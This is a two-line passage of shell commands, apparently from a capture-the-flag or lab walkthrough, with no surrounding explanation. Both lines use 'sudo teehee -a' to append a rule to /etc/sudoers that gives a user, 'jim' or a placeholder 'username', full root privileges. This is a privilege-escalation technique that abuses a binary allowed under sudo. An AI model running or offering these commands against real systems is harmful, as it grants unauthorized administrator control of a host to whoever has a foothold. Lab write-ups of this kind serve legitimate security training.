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echo "jim ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers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echo "username ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers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